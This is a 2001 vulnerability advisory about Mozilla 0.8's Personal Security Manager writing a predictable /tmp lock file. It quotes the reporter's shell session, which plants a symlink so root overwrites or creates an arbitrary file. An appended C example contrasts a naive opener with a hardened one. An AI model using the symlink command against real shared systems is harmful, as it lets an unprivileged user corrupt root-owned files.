Mozilla Personal Security Manager Uses Unsafe Temporary Files and May Allow Local Users to Overwrite Critical Files on the Server

Date: Dec 27 2001

Impact: Denial of service via local system, Modification of system information

Version(s): Mozilla 0.8

Description: A vulnerability was reported in the Mozilla Personal Security Manager. A local user could cause files to be overwritten.

A local user can create a symbolic link from a temporary file used by the Mozilla Personal Security Manager (PSM) to another critical file. Then, when a privileged user accesses a secure web site, thereby invoking Mozilla PSM, the linked file will be overwritten.

Impact: A local user may be able to cause critical files to be overwritten on the host.

Solution: No solution was available at the time of this entry.

Vendor URL: www.mozilla.org/projects/security/pki/psm/

Cause: Access control error, State error

Underlying OS: Linux (Any), UNIX (Any)

Reported By: KF <dotslash@snosoft.com>

Message History:
This archive entry has one or more follow-up message(s) listed below.

Source Message Contents
Date: Wed, 26 Dec 2001 12:50:59 -0500
From: KF <dotslash@snosoft.com>
Subject: Mozilla personal security manager /tmp issues
Playing with /tmp a bit this morning I ran into the following issue in
mozilla...
*with mozilla open
[root@linuxppc root]# fuser -n file /tmp/.nsmc-0-lock
/tmp/.nsmc-0-lock: 3220 3223 3224 3226 3227 3228 3229
[root@linuxppc root]# ps -ef | grep 3220
root 3220 1 0 12:42 ? 00:00:00 ./psm
sh-2.05$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
sh-2.05$ ln -s /etc/hrmm /tmp/.nsmc-0-lock
sh-2.05$ ls -al /etc/hrmm
ls: /etc/hrmm: No such file or directory
*wait for root to go to https://www.securepage.com to view his banking
info.
sh-2.05$ ls -al /etc/hrmm
-rw------- 1 root root 0 Dec 26 12:42 /etc/hrmm
Let's see what happened here.... when root went to the secure page
mozilla calls /usr/lib/mozilla/psm
root 3220 1 1 12:42 ? 00:00:00 ./psm
root 3223 3220 0 12:42 ? 00:00:00 ./psm
root 3224 3223 0 12:42 ? 00:00:00 ./psm
root 3226 3223 0 12:42 ? 00:00:00 ./psm
root 3227 3223 0 12:42 ? 00:00:00 ./psm
root 3228 3223 0 12:42 ? 00:00:00 ./psm
root 3229 3223 0 12:42 ? 00:00:00 ./psm
[root@linuxppc root]# strings /usr/lib/mozilla/psm | grep /tmp/.
/tmp/.nsmc-%d-lock
/tmp/.nsmc-%d
Above is how we ended up with /etc/hrmm....
And of course here is my version info.
[root@linuxppc root]# rpm -qa | grep mozilla
Help -> about mozilla says...
Mozilla 0.8 <http://www.mozilla.org/releases/>
Mozilla/5.0 (X11; U; Linux 2.4.4-6.2mdk ppc; en-US; 0.8) Gecko/20010814
mozilla-psm-0.8-7.1mdk
mozilla-irc-0.8-7.1mdk
mozilla-0.8-7.1mdk
mozilla-mail-0.8-7.1mdk
nautilus-mozilla-1.0.1.1-5mdk
[root@linuxppc root]# cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for ppc
*Happy new year@##$~!
-KF
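
Added example, not part of the original advisory or message and not Mozilla PSM's code: a C program showing how a lock file at a fixed path can be created without following a symbolic link that already sits at that path, beside a naive opener that follows it. The function names, the scratch directory and the naive opener are assumptions for illustration; the advisory does not show PSM's actual open call.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed "before" pattern: open-or-create at a fixed path, following links. */
int open_lock_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT, 0600);
}

/* Hardened: O_EXCL makes open() fail with EEXIST when anything, including a
 * dangling symlink, already sits at path; O_NOFOLLOW rejects a final-component
 * symlink. fstat() then checks the object that was actually opened. */
int open_lock_safe(const char *path) {
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed check: in a private scratch directory, place a symlink where the
 * lock file is expected, call the opener, and report whether the link target
 * came into existence. Returns 1 = target created, 0 = not, -1 = setup error. */
int target_created_by(int (*opener)(const char *)) {
    char dir[] = "/tmp/lockdemo-XXXXXX", lock[64], victim[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(lock, sizeof lock, "%s/.demo-lock", dir);
    snprintf(victim, sizeof victim, "%s/target", dir);
    if (symlink(victim, lock) != 0) { rmdir(dir); return -1; }
    int fd = opener(lock);
    if (fd >= 0) close(fd);
    int created = (stat(victim, &st) == 0);
    unlink(victim); unlink(lock); rmdir(dir);
    return created;
}

int main(void) {
    printf("naive open created link target:    %d\n", target_created_by(open_lock_unsafe));
    printf("hardened open created link target: %d\n", target_created_by(open_lock_safe));
    return 0;
}
```

Keeping lock and state files in a per-user directory with mode 0700 instead of a predictable name directly under /tmp removes the shared location that makes the link possible in the first place.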